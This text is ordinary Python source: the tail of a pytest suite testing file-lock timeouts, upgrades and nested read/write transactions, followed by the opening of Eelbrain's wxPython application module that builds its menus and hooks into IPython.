TimeoutWrite(lock_path, 0, 1))
def test_write_lock_timeout_on_read_ranges_3(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 1),
AcquireRead(lock_path, 10, 1),
TimeoutWrite(lock_path, 0, 1),
TimeoutWrite(lock_path, 10, 1))
def test_write_lock_timeout_on_read_ranges_4(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 64),
TimeoutWrite(lock_path, 10, 1),
TimeoutWrite(lock_path, 32, 1))
def test_write_lock_timeout_on_read_ranges_5(lock_path):
multiproc_test(
AcquireRead(lock_path, 64, 128),
TimeoutWrite(lock_path, 65, 1),
TimeoutWrite(lock_path, 127, 1),
TimeoutWrite(lock_path, 90, 10))
#
# Test that exclusive locks time while lots of shared locks are held.
#
def test_write_lock_timeout_with_multiple_readers_2_1(lock_path):
multiproc_test(
AcquireRead(lock_path),
AcquireRead(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_with_multiple_readers_2_2(lock_path):
multiproc_test(
AcquireRead(lock_path),
AcquireRead(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_with_multiple_readers_3_1(lock_path):
multiproc_test(
AcquireRead(lock_path),
AcquireRead(lock_path),
AcquireRead(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_with_multiple_readers_3_2(lock_path):
multiproc_test(
AcquireRead(lock_path),
AcquireRead(lock_path),
AcquireRead(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_with_multiple_readers_2_1_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 10),
AcquireRead(lock_path, 0.5, 10),
TimeoutWrite(lock_path, 5, 5))
def test_write_lock_timeout_with_multiple_readers_2_3_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 10),
AcquireRead(lock_path, 5, 15),
TimeoutWrite(lock_path, 0, 1),
TimeoutWrite(lock_path, 11, 3),
TimeoutWrite(lock_path, 7, 1))
def test_write_lock_timeout_with_multiple_readers_3_1_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 5),
AcquireRead(lock_path, 5, 5),
AcquireRead(lock_path, 10, 5),
TimeoutWrite(lock_path, 0, 15))
def test_write_lock_timeout_with_multiple_readers_3_2_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 5),
AcquireRead(lock_path, 5, 5),
AcquireRead(lock_path, 10, 5),
TimeoutWrite(lock_path, 3, 10),
TimeoutWrite(lock_path, 5, 1))
@pytest.mark.skipif(os.getuid() == 0, reason='user is root')
def test_read_lock_on_read_only_lockfile(lock_dir, lock_path):
"""read-only directory, read-only lockfile."""
touch(lock_path)
with read_only(lock_path, lock_dir):
lock = lk.Lock(lock_path)
with lk.ReadTransaction(lock):
pass
with pytest.raises(lk.LockROFileError):
with lk.WriteTransaction(lock):
pass
def test_read_lock_read_only_dir_writable_lockfile(lock_dir, lock_path):
"""read-only directory, writable lockfile."""
touch(lock_path)
with read_only(lock_dir):
lock = lk.Lock(lock_path)
with lk.ReadTransaction(lock):
pass
with lk.WriteTransaction(lock):
pass
@pytest.mark.skipif(os.getuid() == 0, reason='user is root')
def test_read_lock_no_lockfile(lock_dir, lock_path):
"""read-only directory, no lockfile (so can't create)."""
with read_only(lock_dir):
lock = lk.Lock(lock_path)
with pytest.raises(lk.CantCreateLockError):
with lk.ReadTransaction(lock):
pass
with pytest.raises(lk.CantCreateLockError):
with lk.WriteTransaction(lock):
pass
def test_upgrade_read_to_write(private_lock_path):
"""Test that a read lock can be upgraded to a write lock.
Note that to upgrade a read lock to a write lock, you have the be the
only holder of a read lock. Client code needs to coordinate that for
shared locks. For this test, we use a private lock just to test that an
upgrade is possible.
"""
# ensure lock file exists the first time, so we open it read-only
# to begin wtih.
touch(private_lock_path)
lock = lk.Lock(private_lock_path)
assert lock._reads == 0
assert lock._writes == 0
lock.acquire_read()
assert lock._reads == 1
assert lock._writes == 0
assert lock._file.mode == 'r+'
lock.acquire_write()
assert lock._reads == 1
assert lock._writes == 1
assert lock._file.mode == 'r+'
lock.release_write()
assert lock._reads == 1
assert lock._writes == 0
assert lock._file.mode == 'r+'
lock.release_read()
assert lock._reads == 0
assert lock._writes == 0
assert lock._file is None
def test_upgrade_read_to_write_fails_with_readonly_file(private_lock_path):
"""Test that read-only file can be read-locked but not write-locked."""
# ensure lock file exists the first time
touch(private_lock_path)
# open it read-only to begin wtih.
with read_only(private_lock_path):
lock = lk.Lock(private_lock_path)
assert lock._reads == 0
assert lock._writes == 0
lock.acquire_read()
assert lock._reads == 1
assert lock._writes == 0
assert lock._file.mode == 'r'
# upgrade to writ here
with pytest.raises(lk.LockROFileError):
lock.acquire_write()
class ComplexAcquireAndRelease(object):
def __init__(self, lock_path):
self.lock_path = lock_path
def p1(self, barrier):
lock = lk.Lock(self.lock_path)
lock.acquire_write()
barrier.wait() # ---------------------------------------- 1
# others test timeout
barrier.wait() # ---------------------------------------- 2
lock.release_write() # release and others acquire read
barrier.wait() # ---------------------------------------- 3
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
lock.acquire_read()
barrier.wait() # ---------------------------------------- 4
lock.release_read()
barrier.wait() # ---------------------------------------- 5
# p2 upgrades read to write
barrier.wait() # ---------------------------------------- 6
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 7
# p2 releases write and read
barrier.wait() # ---------------------------------------- 8
# p3 acquires read
barrier.wait() # ---------------------------------------- 9
# p3 upgrades read to write
barrier.wait() # ---------------------------------------- 10
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 11
# p3 releases locks
barrier.wait() # ---------------------------------------- 12
lock.acquire_read()
barrier.wait() # ---------------------------------------- 13
lock.release_read()
def p2(self, barrier):
lock = lk.Lock(self.lock_path)
# p1 acquires write
barrier.wait() # ---------------------------------------- 1
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 2
lock.acquire_read()
barrier.wait() # ---------------------------------------- 3
# p1 tests shared read
barrier.wait() # ---------------------------------------- 4
# others release reads
barrier.wait() # ---------------------------------------- 5
lock.acquire_write() # upgrade read to write
barrier.wait() # ---------------------------------------- 6
# others test timeout
barrier.wait() # ---------------------------------------- 7
lock.release_write() # release read AND write (need both)
lock.release_read()
barrier.wait() # ---------------------------------------- 8
# p3 acquires read
barrier.wait() # ---------------------------------------- 9
# p3 upgrades read to write
barrier.wait() # ---------------------------------------- 10
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 11
# p3 releases locks
barrier.wait() # ---------------------------------------- 12
lock.acquire_read()
barrier.wait() # ---------------------------------------- 13
lock.release_read()
def p3(self, barrier):
lock = lk.Lock(self.lock_path)
# p1 acquires write
barrier.wait() # ---------------------------------------- 1
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 2
lock.acquire_read()
barrier.wait() # ---------------------------------------- 3
# p1 tests shared read
barrier.wait() # ---------------------------------------- 4
lock.release_read()
barrier.wait() # ---------------------------------------- 5
# p2 upgrades read to write
barrier.wait() # ---------------------------------------- 6
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 7
# p2 releases write & read
barrier.wait() # ---------------------------------------- 8
lock.acquire_read()
barrier.wait() # ---------------------------------------- 9
lock.acquire_write()
barrier.wait() # ---------------------------------------- 10
# others test timeout
barrier.wait() # ---------------------------------------- 11
lock.release_read() # release read AND write in opposite
lock.release_write() # order from before on p2
barrier.wait() # ---------------------------------------- 12
lock.acquire_read()
barrier.wait() # ---------------------------------------- 13
lock.release_read()
#
# Longer test case that ensures locks are reusable. Ordering is
# enforced by barriers throughout -- steps are shown with numbers.
#
def test_complex_acquire_and_release_chain(lock_path):
test_chain = ComplexAcquireAndRelease(lock_path)
multiproc_test(test_chain.p1,
test_chain.p2,
test_chain.p3)
class AssertLock(lk.Lock):
"""Test lock class that marks acquire/release events."""
def __init__(self, lock_path, vals):
super(AssertLock, self).__init__(lock_path)
self.vals = vals
# assert hooks for subclasses
assert_acquire_read = lambda self: None
assert_acquire_write = lambda self: None
assert_release_read = lambda self: None
assert_release_write = lambda self: None
def acquire_read(self, timeout=None):
self.assert_acquire_read()
result = super(AssertLock, self).acquire_read(timeout)
self.vals['acquired_read'] = True
return result
def acquire_write(self, timeout=None):
self.assert_acquire_write()
result = super(AssertLock, self).acquire_write(timeout)
self.vals['acquired_write'] = True
return result
def release_read(self, release_fn=None):
self.assert_release_read()
result = super(AssertLock, self).release_read(release_fn)
self.vals['released_read'] = True
return result
def release_write(self, release_fn=None):
self.assert_release_write()
result = super(AssertLock, self).release_write(release_fn)
self.vals['released_write'] = True
return result
@pytest.mark.parametrize(
"transaction,type",
[(lk.ReadTransaction, "read"), (lk.WriteTransaction, "write")]
)
def test_transaction(lock_path, transaction, type):
class MockLock(AssertLock):
def assert_acquire_read(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_read(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def assert_acquire_write(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_write(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def enter_fn():
# assert enter_fn is called while lock is held
assert vals['acquired_%s' % type]
vals['entered_fn'] = True
def exit_fn(t, v, tb):
# assert exit_fn is called while lock is held
assert not vals['released_%s' % type]
vals['exited_fn'] = True
vals['exception'] = (t or v or tb)
vals = collections.defaultdict(lambda: False)
lock = MockLock(lock_path, vals)
with transaction(lock, acquire=enter_fn, release=exit_fn):
assert vals['acquired_%s' % type]
assert not vals['released_%s' % type]
assert vals['entered_fn']
assert vals['exited_fn']
assert vals['acquired_%s' % type]
assert vals['released_%s' % type]
assert not vals['exception']
@pytest.mark.parametrize(
"transaction,type",
[(lk.ReadTransaction, "read"), (lk.WriteTransaction, "write")]
)
def test_transaction_with_exception(lock_path, transaction, type):
class MockLock(AssertLock):
def assert_acquire_read(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_read(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def assert_acquire_write(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_write(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def enter_fn():
assert vals['acquired_%s' % type]
vals['entered_fn'] = True
def exit_fn(t, v, tb):
assert not vals['released_%s' % type]
vals['exited_fn'] = True
vals['exception'] = (t or v or tb)
return exit_result
exit_result = False
vals = collections.defaultdict(lambda: False)
lock = MockLock(lock_path, vals)
with pytest.raises(Exception):
with transaction(lock, acquire=enter_fn, release=exit_fn):
raise Exception()
assert vals['entered_fn']
assert vals['exited_fn']
assert vals['exception']
# test suppression of exceptions from exit_fn
exit_result = True
vals.clear()
# should not raise now.
with transaction(lock, acquire=enter_fn, release=exit_fn):
raise Exception()
assert vals['entered_fn']
assert vals['exited_fn']
assert vals['exception']
@pytest.mark.parametrize(
"transaction,type",
[(lk.ReadTransaction, "read"), (lk.WriteTransaction, "write")]
)
def test_transaction_with_context_manager(lock_path, transaction, type):
class MockLock(AssertLock):
def assert_acquire_read(self):
assert not vals['entered_ctx']
assert not vals['exited_ctx']
def assert_release_read(self):
assert vals['entered_ctx']
assert vals['exited_ctx']
def assert_acquire_write(self):
assert not vals['entered_ctx']
assert not vals['exited_ctx']
def assert_release_write(self):
assert vals['entered_ctx']
assert vals['exited_ctx']
class TestContextManager(object):
def __enter__(self):
vals['entered_ctx'] = True
def __exit__(self, t, v, tb):
assert not vals['released_%s' % type]
vals['exited_ctx'] = True
vals['exception_ctx'] = (t or v or tb)
return exit_ctx_result
def exit_fn(t, v, tb):
assert not vals['released_%s' % type]
vals['exited_fn'] = True
vals['exception_fn'] = (t or v or tb)
return exit_fn_result
exit_fn_result, exit_ctx_result = False, False
vals = collections.defaultdict(lambda: False)
lock = MockLock(lock_path, vals)
with transaction(lock, acquire=TestContextManager, release=exit_fn):
pass
assert vals['entered_ctx']
assert vals['exited_ctx']
assert vals['exited_fn']
assert not vals['exception_ctx']
assert not vals['exception_fn']
vals.clear()
with transaction(lock, acquire=TestContextManager):
pass
assert vals['entered_ctx']
assert vals['exited_ctx']
assert not vals['exited_fn']
assert not vals['exception_ctx']
assert not vals['exception_fn']
# below are tests for exceptions with and without suppression
def assert_ctx_and_fn_exception(raises=True):
vals.clear()
if raises:
with pytest.raises(Exception):
with transaction(
lock, acquire=TestContextManager, release=exit_fn):
raise Exception()
else:
with transaction(
lock, acquire=TestContextManager, release=exit_fn):
raise Exception()
assert vals['entered_ctx']
assert vals['exited_ctx']
assert vals['exited_fn']
assert vals['exception_ctx']
assert vals['exception_fn']
def assert_only_ctx_exception(raises=True):
vals.clear()
if raises:
with pytest.raises(Exception):
with transaction(lock, acquire=TestContextManager):
raise Exception()
else:
with transaction(lock, acquire=TestContextManager):
raise Exception()
assert vals['entered_ctx']
assert vals['exited_ctx']
assert not vals['exited_fn']
assert vals['exception_ctx']
assert not vals['exception_fn']
# no suppression
assert_ctx_and_fn_exception(raises=True)
assert_only_ctx_exception(raises=True)
# suppress exception only in function
exit_fn_result, exit_ctx_result = True, False
assert_ctx_and_fn_exception(raises=False)
assert_only_ctx_exception(raises=True)
# suppress exception only in context
exit_fn_result, exit_ctx_result = False, True
assert_ctx_and_fn_exception(raises=False)
assert_only_ctx_exception(raises=False)
# suppress exception in function and context
exit_fn_result, exit_ctx_result = True, True
assert_ctx_and_fn_exception(raises=False)
assert_only_ctx_exception(raises=False)
def test_nested_write_transaction(lock_path):
    """Ensure that the outermost write transaction writes."""
    def write(t, v, tb):
        # release callback: record that the lock's write hook fired
        vals['wrote'] = True

    vals = collections.defaultdict(lambda: False)
    lock = AssertLock(lock_path, vals)

    # write/write: only the outermost write transaction triggers the write
    with lk.WriteTransaction(lock, release=write):
        assert not vals['wrote']
        with lk.WriteTransaction(lock, release=write):
            assert not vals['wrote']
        assert not vals['wrote']
    assert vals['wrote']

    # read/write: the write transaction is outermost *writer*, so it writes
    # on its own exit, even while the read transaction is still open
    vals.clear()
    with lk.ReadTransaction(lock):
        assert not vals['wrote']
        with lk.WriteTransaction(lock, release=write):
            assert not vals['wrote']
        assert vals['wrote']

    # write/read/write: inner write is nested in an outer write, so only the
    # outermost write transaction writes on final exit
    vals.clear()
    with lk.WriteTransaction(lock, release=write):
        assert not vals['wrote']
        with lk.ReadTransaction(lock):
            assert not vals['wrote']
            with lk.WriteTransaction(lock, release=write):
                assert not vals['wrote']
            assert not vals['wrote']
        assert not vals['wrote']
    assert vals['wrote']

    # read/write/read/write: outermost *write* transaction (second level)
    # performs the write when it exits, inside the outer read transaction
    vals.clear()
    with lk.ReadTransaction(lock):
        assert not vals['wrote']
        with lk.WriteTransaction(lock, release=write):
            assert not vals['wrote']
            with lk.ReadTransaction(lock):
                assert not vals['wrote']
                with lk.WriteTransaction(lock, release=write):
                    assert not vals['wrote']
                assert not vals['wrote']
            assert not vals['wrote']
        assert vals['wrote']
def test_nested_reads(lock_path):
    """Ensure that write transactions won't re-read data."""
    def read():
        # acquire callback: count how many times data was (re-)read
        vals['read'] += 1

    vals = collections.defaultdict(lambda: 0)
    lock = AssertLock(lock_path, vals)

    # read/read: nested read transaction does not re-read
    vals.clear()
    assert vals['read'] == 0
    with lk.ReadTransaction(lock, acquire=read):
        assert vals['read'] == 1
        with lk.ReadTransaction(lock, acquire=read):
            assert vals['read'] == 1

    # write/write: nested write transaction does not re-read
    vals.clear()
    assert vals['read'] == 0
    with lk.WriteTransaction(lock, acquire=read):
        assert vals['read'] == 1
        with lk.WriteTransaction(lock, acquire=read):
            assert vals['read'] == 1

    # read/write: upgrade to write inside a read does not re-read
    vals.clear()
    assert vals['read'] == 0
    with lk.ReadTransaction(lock, acquire=read):
        assert vals['read'] == 1
        with lk.WriteTransaction(lock, acquire=read):
            assert vals['read'] == 1

    # write/read/write: no level of nesting triggers a re-read
    vals.clear()
    assert vals['read'] == 0
    with lk.WriteTransaction(lock, acquire=read):
        assert vals['read'] == 1
        with lk.ReadTransaction(lock, acquire=read):
            assert vals['read'] == 1
            with lk.WriteTransaction(lock, acquire=read):
                assert vals['read'] == 1

    # read/write/read/write: still exactly one read at the outermost level
    vals.clear()
    assert vals['read'] == 0
    with lk.ReadTransaction(lock, acquire=read):
        assert vals['read'] == 1
        with lk.WriteTransaction(lock, acquire=read):
            assert vals['read'] == 1
            with lk.ReadTransaction(lock, acquire=read):
                assert vals['read'] == 1
                with lk.WriteTransaction(lock, acquire=read):
                    assert vals['read'] == 1
class LockDebugOutput(object):
    """Two cooperating processes that verify a debug-enabled Lock records
    pid/host information in the lock file.

    ``p1`` and ``p2`` are run in separate processes and synchronize through a
    shared barrier; queues are used to exchange pids up front.
    """

    def __init__(self, lock_path):
        self.lock_path = lock_path
        # both processes run on the same machine, so host must match
        self.host = socket.gethostname()

    def p1(self, barrier, q1, q2):
        """First process: takes the initial write lock, recording its pid/host."""
        # exchange pids
        p1_pid = os.getpid()
        q1.put(p1_pid)
        p2_pid = q2.get()

        # set up lock
        lock = lk.Lock(self.lock_path, debug=True)

        with lk.WriteTransaction(lock):
            # p1 takes write lock and writes pid/host to file
            barrier.wait()  # ------------------------------------ 1

        assert lock.pid == p1_pid
        assert lock.host == self.host

        # wait for p2 to verify contents of file
        barrier.wait()  # ---------------------------------------- 2

        # wait for p2 to take a write lock
        barrier.wait()  # ---------------------------------------- 3

        # verify pid/host info again: p2's write moved p1's info to old_*
        with lk.ReadTransaction(lock):
            assert lock.old_pid == p1_pid
            assert lock.old_host == self.host

            assert lock.pid == p2_pid
            assert lock.host == self.host

        barrier.wait()  # ---------------------------------------- 4

    def p2(self, barrier, q1, q2):
        """Second process: reads p1's debug info, then overwrites it."""
        # exchange pids
        p2_pid = os.getpid()
        p1_pid = q1.get()
        q2.put(p2_pid)

        # set up lock
        lock = lk.Lock(self.lock_path, debug=True)

        # p1 takes write lock and writes pid/host to file
        barrier.wait()  # ---------------------------------------- 1

        # verify that p1 wrote information to lock file
        with lk.ReadTransaction(lock):
            assert lock.pid == p1_pid
            assert lock.host == self.host

        barrier.wait()  # ---------------------------------------- 2

        # take a write lock on the file and verify pid/host info
        with lk.WriteTransaction(lock):
            assert lock.old_pid == p1_pid
            assert lock.old_host == self.host

            assert lock.pid == p2_pid
            assert lock.host == self.host

            barrier.wait()  # ------------------------------------ 3

        # wait for p1 to verify pid/host info
        barrier.wait()  # ---------------------------------------- 4
def test_lock_debug_output(lock_path):
    """Run the two LockDebugOutput processes against each other."""
    helper = LockDebugOutput(lock_path)
    queues = (Queue(), Queue())
    local_multiproc_test(helper.p2, helper.p1, extra_args=queues)
def test_lock_with_no_parent_directory(tmpdir):
    """Make sure locks work even when their parent directory does not exist."""
    with tmpdir.as_cwd():
        # the lock path points several directories deep; none exist yet
        deep_lock = lk.Lock('foo/bar/baz/lockfile')
        with lk.WriteTransaction(deep_lock):
            pass
def test_lock_in_current_directory(tmpdir):
    """Make sure locks work when created with a bare filename in the cwd."""
    with tmpdir.as_cwd():
        # test we can create a lock in the current directory
        lock = lk.Lock('lockfile')
        for i in range(10):
            with lk.ReadTransaction(lock):
                pass
            with lk.WriteTransaction(lock):
                pass

        # and that we can do the same thing after it's already there
        lock = lk.Lock('lockfile')
        for i in range(10):
            with lk.ReadTransaction(lock):
                pass
            with lk.WriteTransaction(lock):
                pass
def test_attempts_str():
    """_attempts_str is empty for at most one attempt, descriptive otherwise."""
    for wait_time, nattempts, expected in [
            (0, 0, ''),
            (0.12, 1, ''),
            (12.345, 2, ' after 12.35s and 2 attempts')]:
        assert lk._attempts_str(wait_time, nattempts) == expected
def test_lock_str():
    """str(Lock) shows the path, byte range, timeout, and usage counters."""
    lockstr = str(lk.Lock('lockfile'))
    for fragment in ('lockfile[0:0]', 'timeout=None', '#reads=0, #writes=0'):
        assert fragment in lockstr
def test_downgrade_write_okay(tmpdir):
    """Test the lock write-to-read downgrade operation."""
    with tmpdir.as_cwd():
        lock = lk.Lock('lockfile')
        lock.acquire_write()
        lock.downgrade_write_to_read()
        # the write became a read: one reader, no writers
        assert (lock._reads, lock._writes) == (1, 0)
def test_downgrade_write_fails(tmpdir):
    """Downgrading without holding a write lock raises LockDowngradeError."""
    with tmpdir.as_cwd():
        lock = lk.Lock('lockfile')
        lock.acquire_read()
        expected = 'Cannot downgrade lock from write to read on file: lockfile'
        with pytest.raises(lk.LockDowngradeError, match=expected):
            lock.downgrade_write_to_read()
@pytest.mark.parametrize("err_num,err_msg",
                         [(errno.EACCES, "Fake EACCES error"),
                          (errno.EAGAIN, "Fake EAGAIN error"),
                          (errno.ENOENT, "Fake ENOENT error")])
def test_poll_lock_exception(tmpdir, monkeypatch, err_num, err_msg):
    """Test poll lock exception handling."""
    # fake fcntl.lockf replacement that always fails with the parametrized
    # errno; parameter renamed from `len` to `length` — `len` shadowed the
    # builtin (fcntl.lockf is called positionally, so the rename is safe)
    def _lockf(fd, cmd, length, start, whence):
        raise IOError(err_num, err_msg)

    with tmpdir.as_cwd():
        lockfile = 'lockfile'
        lock = lk.Lock(lockfile)

        touch(lockfile)
        monkeypatch.setattr(fcntl, 'lockf', _lockf)

        # EAGAIN/EACCES mean the lock is merely held elsewhere: poll fails softly
        if err_num in [errno.EAGAIN, errno.EACCES]:
            assert not lock._poll_lock(fcntl.LOCK_EX)
        else:
            # any other error is unexpected and must propagate
            with pytest.raises(IOError, match=err_msg):
                lock._poll_lock(fcntl.LOCK_EX)
def test_upgrade_read_okay(tmpdir):
    """Test the lock read-to-write upgrade operation."""
    with tmpdir.as_cwd():
        lock = lk.Lock('lockfile')
        lock.acquire_read()
        lock.upgrade_read_to_write()
        # the read became a write: no readers, one writer
        assert (lock._reads, lock._writes) == (0, 1)
def test_upgrade_read_fails(tmpdir):
    """Upgrading while holding a write lock raises LockUpgradeError."""
    with tmpdir.as_cwd():
        lock = lk.Lock('lockfile')
        lock.acquire_write()
        expected = 'Cannot upgrade lock from read to write on file: lockfile'
        with pytest.raises(lk.LockUpgradeError, match=expected):
            lock.upgrade_read_to_write()
|
app.py | from distutils.version import LooseVersion
from logging import getLogger
import select
import sys
from threading import Thread
from time import sleep
import webbrowser
import wx
from wx.adv import TaskBarIcon, TBI_DOCK
from .._utils import IS_OSX, IS_WINDOWS
from ..plot._base import CONFIG
from .about import AboutFrame
from .frame import FOCUS_UI_UPDATE_FUNC_NAMES, EelbrainFrame
from .utils import Icon
from . import ID
APP = None # hold the App instance
JUMPSTART_TIME = 250 # ms
def wildcard(filetypes):
    """Join file-type specs into a wx file-dialog wildcard string.

    Parameters
    ----------
    filetypes : sequence of sequences of str
        Description/pattern string pairs, one per file type.

    Returns
    -------
    str
        ``'|'``-separated wildcard string, or ``""`` for empty/None input.
    """
    if not filetypes:
        return ""
    return '|'.join('|'.join(filetype) for filetype in filetypes)
class App(wx.App):
    """Eelbrain's wx application (singleton; create/retrieve via :func:`get_app`).

    Integrates the wx event loop with IPython/prompt_toolkit where available,
    owns the macOS menu bar and dock icon, and provides terminal-friendly
    modal dialogs (``ask_for_*`` / ``message_box``).
    """
    _pt_thread = None  # per-platform thread target watching terminal input
    about_frame = None  # AboutFrame instance, created lazily in OnAbout
    _result = None  # result handed out of a dialog run via its own MainLoop
    _bash_ui_from_mainloop = None  # whether _bash_ui ran inside the main loop
    _ipython = None  # IPython shell, when GUI integration succeeded
    using_prompt_toolkit = False  # True if prompt_toolkit inputhook is active

    def OnInit(self):
        """wx startup hook: set app names, hook into IPython, build macOS UI."""
        self.SetAppName("Eelbrain")
        self.SetAppDisplayName("Eelbrain")

        # register in IPython (requires IPython >= 5 and enabled config)
        if CONFIG['prompt_toolkit'] and 'IPython' in sys.modules and LooseVersion(sys.modules['IPython'].__version__) >= LooseVersion('5'):
            import IPython.core.error
            if CONFIG['prompt_toolkit'] == 'eelbrain':
                import IPython.terminal.pt_inputhooks
                import IPython.core.pylabtools
                IPython.terminal.pt_inputhooks.register('eelbrain', self.pt_inputhook)
                IPython.core.pylabtools.backend2gui.clear()  # prevent pylab from initializing event-loop
            shell = IPython.get_ipython()
            if shell is not None:
                self._pt_thread = self._pt_thread_win if IS_WINDOWS else self._pt_thread_linux
                try:
                    shell.enable_gui(CONFIG['prompt_toolkit'])
                except IPython.core.error.UsageError:
                    print(f"Prompt-toolkit does not seem to be supported by the current IPython shell ({shell.__class__.__name__}); The Eelbrain GUI needs to block Terminal input to work. Use eelbrain.gui.run() to start GUI interaction.")
                else:
                    self.using_prompt_toolkit = True
                    self._ipython = shell
                    getLogger('Eelbrain').debug("Initialized prompt_toolkit with %s", CONFIG['prompt_toolkit'])
        self.SetExitOnFrameDelete(not self.using_prompt_toolkit)

        if IS_OSX:
            self.dock_icon = DockIcon(self)
            # FIX: keep both attribute spellings in sync; previously the OSX
            # branch set only ``menubar`` while the other branch set only
            # ``menu_bar``, so one of the two was always undefined.
            self.menubar = self.menu_bar = self.CreateMenu(self)
            # list windows in Window menu
            self.window_menu_window_items = []
            self.Bind(wx.EVT_MENU_OPEN, self.OnMenuOpened)
        else:
            self.dock_icon = None
            self.menubar = self.menu_bar = None
            self.window_menu_window_items = None
        return True

    def CreateMenu(self, t):
        """Create Menubar

        Parameters
        ----------
        t : App | EelbrainFrame
            Object to which the menu will be attached; on macOS ``self``, on
            other systems the specific :class:`EelbrainFrame`.
        """
        menu_bar = wx.MenuBar()

        # File Menu
        m = file_menu = wx.Menu()
        m.Append(wx.ID_OPEN, '&Open... \tCtrl+O')
        m.AppendSeparator()
        m.Append(wx.ID_CLOSE, '&Close Window \tCtrl+W')
        m.Append(wx.ID_SAVE, "Save \tCtrl+S")
        m.Append(wx.ID_SAVEAS, "Save As... \tCtrl+Shift+S")
        menu_bar.Append(file_menu, "File")

        # Edit Menu
        m = edit_menu = wx.Menu()
        m.Append(ID.UNDO, '&Undo \tCtrl+Z')
        m.Append(ID.REDO, '&Redo \tCtrl+Shift+Z')
        m.AppendSeparator()
        m.Append(wx.ID_CUT, 'Cut \tCtrl+X')
        m.Append(wx.ID_COPY, 'Copy \tCtrl+C')
        m.Append(ID.COPY_AS_PNG, 'Copy as PNG \tCtrl+Shift+C')
        m.Append(wx.ID_PASTE, 'Paste \tCtrl+V')
        m.AppendSeparator()
        m.Append(wx.ID_CLEAR, 'Cle&ar')
        menu_bar.Append(edit_menu, "Edit")

        # Tools Menu
        # updated by the active GUI
        if IS_OSX or hasattr(t, 'MakeToolsMenu'):
            tools_menu = wx.Menu()
            if not IS_OSX:
                t.MakeToolsMenu(tools_menu)
            menu_bar.Append(tools_menu, "Tools")

        # View Menu
        m = view_menu = wx.Menu()
        m.Append(ID.SET_VLIM, "Set Axis Limits... \tCtrl+l", "Change the current figure's axis limits")
        m.Append(ID.LINK_TIME_AXES, "Link Time Axes", "Synchronize the time displayed on figures")
        m.Append(ID.SET_MARKED_CHANNELS, "Mark Channels...", "Mark specific channels in plots")
        m.Append(ID.DRAW_CROSSHAIRS, "Draw &Crosshairs", "Draw crosshairs under the cursor", kind=wx.ITEM_CHECK)
        m.AppendSeparator()
        m.Append(ID.SET_LAYOUT, "&Set Layout... \tCtrl+Shift+l", "Change the page layout")
        menu_bar.Append(view_menu, "View")

        # Go Menu
        m = go_menu = wx.Menu()
        m.Append(wx.ID_FORWARD, '&Forward \tCtrl+]', 'Go One Page Forward')
        m.Append(wx.ID_BACKWARD, '&Back \tCtrl+[', 'Go One Page Back')
        m.Append(ID.TIME, '&Time... \tCtrl+t', 'Go to time...')
        if not self.using_prompt_toolkit:
            m.AppendSeparator()
            m.Append(ID.YIELD_TO_TERMINAL, '&Yield to Terminal \tAlt+Ctrl+Q')
        menu_bar.Append(go_menu, "Go")

        # Window Menu
        m = window_menu = wx.Menu()
        m.Append(ID.WINDOW_MINIMIZE, '&Minimize \tCtrl+M')
        m.Append(ID.WINDOW_ZOOM, '&Zoom')
        m.Append(ID.SET_TITLE, '&Set Title')
        m.AppendSeparator()
        m.Append(ID.WINDOW_TILE, '&Tile')
        m.AppendSeparator()
        menu_bar.Append(window_menu, "Window")

        # Help Menu
        m = help_menu = wx.Menu()
        m.Append(ID.HELP_EELBRAIN, 'Eelbrain Help')
        m.Append(ID.HELP_PYTHON, "Python Help")
        m.AppendSeparator()
        m.Append(wx.ID_ABOUT, '&About Eelbrain')
        menu_bar.Append(help_menu, self.GetMacHelpMenuTitleName() if IS_OSX else 'Help')

        # Menu Bar
        wx.MenuBar.MacSetCommonMenuBar(menu_bar)

        # Bind Menu Commands
        t.Bind(wx.EVT_MENU, self.OnAbout, id=wx.ID_ABOUT)
        t.Bind(wx.EVT_MENU, t.OnOpen, id=wx.ID_OPEN)
        t.Bind(wx.EVT_MENU, t.OnClear, id=wx.ID_CLEAR)
        t.Bind(wx.EVT_MENU, t.OnWindowClose, id=wx.ID_CLOSE)
        t.Bind(wx.EVT_MENU, t.OnCopy, id=wx.ID_COPY)
        t.Bind(wx.EVT_MENU, self.OnCopyAsPNG, id=ID.COPY_AS_PNG)
